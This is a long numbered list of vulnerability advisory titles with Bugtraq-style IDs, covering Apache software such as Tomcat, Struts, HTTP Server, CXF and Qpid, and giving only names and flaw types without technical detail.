13540| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
13541| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
13542| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
13543| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
13544| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
13545| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
13546| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
13547| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
13548| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
13549| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
13550| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
13551| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
13552| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
13553| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
13554| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
13555| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
13556| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
13557| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
13558| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
13559| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
13560| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
13561| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
13562| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
13563| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
13564| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
13565| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
13566| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
13567| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
13568| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
13569| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
13570| [59670] Apache VCL Multiple Input Validation Vulnerabilities
13571| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
13572| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
13573| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
13574| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
13575| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
13576| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
13577| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
13578| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
13579| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
13580| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
13581| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
13582| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
13583| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
13584| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
13585| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
13586| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
13587| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
13588| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
13589| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
13590| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
13591| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
13592| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
13593| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
13594| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
13595| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
13596| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
13597| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
13598| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
13599| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
13600| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
13601| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
13602| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
13603| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
13604| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
13605| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
13606| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
13607| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
13608| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
13609| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
13610| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
13611| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
13612| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
13613| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
13614| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
13615| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
13616| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
13617| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
13618| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
13619| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
13620| [54798] Apache Libcloud Man In The Middle Vulnerability
13621| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
13622| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
13623| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
13624| [54189] Apache Roller Cross Site Request Forgery Vulnerability
13625| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
13626| [53880] Apache CXF Child Policies Security Bypass Vulnerability
13627| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
13628| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
13629| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
13630| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
13631| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
13632| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
13633| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
13634| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
13635| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
13636| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
13637| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
13638| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
13639| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
13640| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
13641| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
13642| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
13643| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
13644| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
13645| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
13646| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
13647| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
13648| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
13649| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
13650| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
13651| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
13652| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
13653| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
13654| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
13655| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
13656| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
13657| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
13658| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
13659| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
13660| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
13661| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
13662| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
13663| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
13664| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
13665| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
13666| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
13667| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
13668| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
13669| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
13670| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
13671| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
13672| [49290] Apache Wicket Cross Site Scripting Vulnerability
13673| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
13674| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
13675| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
13676| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
13677| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
13678| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
13679| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
13680| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
13681| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
13682| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
13683| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
13684| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
13685| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
13686| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
13687| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
13688| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
13689| [46953] Apache MPM-ITK Module Security Weakness
13690| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
13691| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
13692| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
13693| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
13694| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
13695| [46166] Apache Tomcat JVM Denial of Service Vulnerability
13696| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
13697| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
13698| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
13699| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
13700| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
13701| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
13702| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
13703| [44616] Apache Shiro Directory Traversal Vulnerability
13704| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
13705| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
13706| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
13707| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
13708| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
13709| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
13710| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
13711| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
13712| [42492] Apache CXF XML DTD Processing Security Vulnerability
13713| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
13714| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
13715| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
13716| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
13717| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
13718| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
13719| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
13720| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
13721| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
13722| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
13723| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
13724| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
13725| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
13726| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
13727| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
13728| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
13729| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
13730| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
13731| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
13732| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
13733| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
13734| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
13735| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
13736| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
13737| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
13738| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
13739| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
13740| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
13741| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
13742| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
13743| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
13744| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
13745| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
13746| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
13747| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
13748| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
13749| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
13750| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
13751| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
13752| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
13753| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
13754| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
13755| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
13756| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
13757| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
13758| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
13759| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
13760| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
13761| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
13762| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
13763| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
13764| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
13765| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
13766| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
13767| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
13768| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
13769| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
13770| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
13771| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
13772| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
13773| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
13774| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
13775| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
13776| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
13777| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
13778| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
13779| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
13780| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
13781| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
13782| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
13783| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
13784| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
13785| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
13786| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
13787| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
13788| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
13789| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
13790| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
13791| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
13792| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
13793| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
13794| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
13795| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
13796| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
13797| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
13798| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
13799| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
13800| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
13801| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
13802| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
13803| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
13804| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
13805| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
13806| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
13807| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
13808| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
13809| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
13810| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
13811| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
13812| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
13813| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
13814| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
13815| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
13816| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
13817| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
13818| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
13819| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
13820| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
13821| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
13822| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
13823| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
13824| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
13825| [20527] Apache Mod_TCL Remote Format String Vulnerability
13826| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
13827| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
13828| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
13829| [19106] Apache Tomcat Information Disclosure Vulnerability
13830| [18138] Apache James SMTP Denial Of Service Vulnerability
13831| [17342] Apache Struts Multiple Remote Vulnerabilities
13832| [17095] Apache Log4Net Denial Of Service Vulnerability
13833| [16916] Apache mod_python FileSession Code Execution Vulnerability
13834| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
13835| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
13836| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
13837| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
13838| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
13839| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
13840| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
13841| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
13842| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
13843| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
13844| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
13845| [15177] PHP Apache 2 Local Denial of Service Vulnerability
13846| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
13847| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
13848| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
13849| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
13850| [14106] Apache HTTP Request Smuggling Vulnerability
13851| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
13852| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
13853| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
13854| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
13855| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
13856| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
13857| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
13858| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
13859| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
13860| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
13861| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
13862| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
13863| [11471] Apache mod_include Local Buffer Overflow Vulnerability
13864| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
13865| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
13866| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
13867| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
13868| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
13869| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
13870| [11094] Apache mod_ssl Denial Of Service Vulnerability
13871| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
13872| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
13873| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
13874| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
13875| [10478] ClueCentral Apache Suexec Patch Security Weakness
13876| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
13877| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
13878| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
13879| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
13880| [9921] Apache Connection Blocking Denial Of Service Vulnerability
13881| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
13882| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
13883| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
13884| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
13885| [9733] Apache Cygwin Directory Traversal Vulnerability
13886| [9599] Apache mod_php Global Variables Information Disclosure Weakness
13887| [9590] Apache-SSL Client Certificate Forging Vulnerability
13888| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
13889| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
13890| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
13891| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
13892| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
13893| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
13894| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
13895| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
13896| [8898] Red Hat Apache Directory Index Default Configuration Error
13897| [8883] Apache Cocoon Directory Traversal Vulnerability
13898| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
13899| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
13900| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
13901| [8707] Apache htpasswd Password Entropy Weakness
13902| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
13903| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
13904| [8226] Apache HTTP Server Multiple Vulnerabilities
13905| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
13906| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
13907| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
13908| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
13909| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
13910| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
13911| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
13912| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
13913| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
13914| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
13915| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
13916| [7255] Apache Web Server File Descriptor Leakage Vulnerability
13917| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
13918| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
13919| [6939] Apache Web Server ETag Header Information Disclosure Weakness
13920| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
